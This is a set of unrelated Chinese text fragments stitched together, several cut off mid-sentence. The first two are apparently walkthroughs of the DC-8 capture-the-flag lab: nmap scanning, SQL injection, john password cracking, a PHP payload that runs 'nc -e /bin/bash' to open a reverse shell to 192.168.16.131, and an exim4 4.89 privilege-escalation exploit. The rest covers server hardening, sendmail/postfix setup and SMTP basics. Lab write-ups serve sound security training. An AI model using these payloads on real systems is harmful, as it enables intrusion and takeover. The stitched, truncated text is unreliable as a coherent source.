exim

1 WEB 刚进来就找到了处SQL注入 找到了貌似是登录用户的用户名和密码。 使用john破解密码,虽然没有爆出admin的密码，但是爆出了john的密码：turtle。 发现下方标记的CMS，查找到后台地址。 登录进去后查找相关信息，找到一个图片上传的点，但是暂时没有办法利用，又在contact us处找到了可疑的提交点，更改test format选项为PHP code，看看会有什么反应。 保存设置后无任何回显，提交表单也没有回显信息，根据提示猜测应该是直接执行，用php反弹shell，提交表单后得到shell。 < p > lalala < p > <?php system( "nc -e /bin/bash 192.168.16.131 4444" ); ?> 2 提权 然后用python获得交互式shell。 python - c ' import pty;pty.spawn("/bin/bash")' 查找SUID。 find / -perm -4000 2 > /dev/ null 没有认识的，网上找复现发现exim4存在提权漏洞，查看版本是4.89，然后搜索一下漏洞。 发现漏洞编号46996，将文件拖下来，搜索可以写入的文件夹。 find / -writable - type d 2 > /dev/ null （直接把文件拖出来会报错，查明原因是文件格式不对

前言： 本文将讲述通过信息收集，再web站点的sql注入漏洞加john爆破登录后台，然后找到远程代码执行漏洞getshell，最后用exim4命令提权漏洞进行权限提升拿到最终的flag。 0x00 环境 VMware 15虚拟机软件； DC-8靶机虚拟机（NAT模式）； kali虚拟机（NAT模式），ip为：192.168.106.129 0x01 信息收集 由于两台机子都开启的是nat模式，那么是在同一个网段里面。我们就可以是用namp先进行同网段的ip存活扫描。 kali的ip为192.168.106.129，因此nmap扫描命令为： nmap -sP 192.168 . 106.1 / 24 129是 kali的 ip，明显，靶机的 ip为 192.168.106.134； 之后针对此 ip进行全端口扫描，看是否开启 web的端口。 nmap命令为： nmap -sS -Pn -p- 192.168 . 106.134 看到目标机开启了 22和 80端口， 22是 ssh协议，可以进行 ssh爆破，然后再 xshell远程连接，但是给了 80,开了 web服务，那先从 web端开打，因为爆破成功率极小，除非是弱密码。 访问弹出了 web页面，用谷歌插件 wappalyzer识别出了这是一个 drupal版本为 7的 CMS搭建的，后台脚本为 php，容器为 apache

一、经常升级系统 将软件更新到最新版本通常是任何操作系统所必需的安全预防措施。软件在更新时通常会在大到关键漏洞补丁、小到bug修复的范围内进行，很多漏洞实际上在被公布时就已经被修复了。 二、自动安全更新 你可以调节服务器关于自动更新的的参数。Fedora的Wiki页面上有一篇文章对自动更新进行了深入解读，文章里提到我们可以通过调整参数为安全更新会把自动更新的风险降低至最少。 当然，是否选择自动更新必须由你自己决定，因为这取决于你将要在你的服务器上进行何种工作。自动更新只能通过仓库里的包才能进行，你自己编译的程序可不能用。你会需要一个与生产环境一致的测试环境，在进行最终部署之前，一定要在测试环境确认无误才行。 · CentOS使用yum-cron 进行自动更新。 · Debian和Ubuntu使用 无人值守更新。 · Fedora使用dnf-automatic。 三、添加一个受限用户账户 我们假定你已经使用 root 权限进入了服务器中，你此时拥有服务器的至高权限，一个不小心就会把服务器搞瘫痪。所以，你应该有一个受限制账户而不是一直使用 root 账户。这不会给你的操作带来多大麻烦，因为你可以通过 sudo来进行任何你想要的操作。 有的发行版可能并不把 sudo设为默认选项，不过你还是可以在软件包仓库中找到。如果你获得的提示是 sudo：command not found

阿里云、腾讯云的操作系统 CentOS 6.x 和 CentOS 7.x 安装 sendmail、postfix 发送邮件时，会遇到无法使用25端口号发送邮件的问题。 本文分享米扑博客折腾了几天的研究成果，全面详细讨论各种正常和异常场景，您遇到的坑我们可能全部都踩过，并给出解决方案。 米扑博客原文：Centos7 配置 sendmail、postfix 端口号25、465 阅读本文前，推荐最好先阅读米扑博客先前的两篇博客： Centos7 使用 sendmail 发送邮件 POP3、SMTP、IMAP 的作用和联系 在讨论之前，先介绍发送邮件的几个场景： 1）本地发送邮件，是指安装完sendmail后，直接由本机发送邮件（小白级） 2）smtp发送邮件，包含设置163、qq等smtp 25、smtps 465 等端口转发（中级） 3）第三方邮件软件方式，如使用 Ubuntu heirloom-mailx、NodeJS Nodemailer、sendEmail 等转发邮件（高级） 4）使用 nginx 代理方式，把端口号25 做转发（专家级） 一、本地发送邮件（小白级） 本地发送邮件，一般是安装完 sendmail、mailx 后，什么都不配置，就直接发送邮件，因此默认是由本机发送邮件 yum -y install sendmail* mailx 本地发送邮件命令： mail -v

第33章 SMTP简单邮件传输协议基础知识 本章节为大家讲解SMTP（Simple Mail Transfer Protocol，简单邮件传输协议）的基础知识，方便后面章节的实战操作。 （本章的知识点主要整理自网络） 33.1 初学者重要提示 33.2 SMTP基础知识参考资料 33.3 SMTP基础知识点 33.4 总结 33.1 初学者重要提示 SMTP简单邮件传输协议在实际项目中有一些实用价值，需要初学者对SMTP的基础知识也有个认识。 33.2 SMTP基础知识参考资料 大家可以从以下地址获得SMTP基础知识： wiki百科中文版SMTP： 地址链接 （这个是超链接） wiki百科英文版SMTP： 地址链接 （这个是超链接） 百度百科SMTP： 地址链接 （这个是超链接） 对于初学者来说，学习上面三个参考资料就够了。如果大家有网络方面的书籍，比如《TCP/IP详解》，也可以直接看书籍。 33.3 SMTP基础知识点 （这里的知识点整理自上面的参考资料地址） 教程这里也对SMTP的基础知识做个介绍，方便大家先有个大概的认识。 33.3.1 SMTP简要说明 SMTP（Simple Mail Transfer Protocol）即简单邮件传输协议,它是一组用于由源地址到目的地址传送邮件的规则，由它来控制信件的中转方式。SMTP协议属于TCP/IP协议族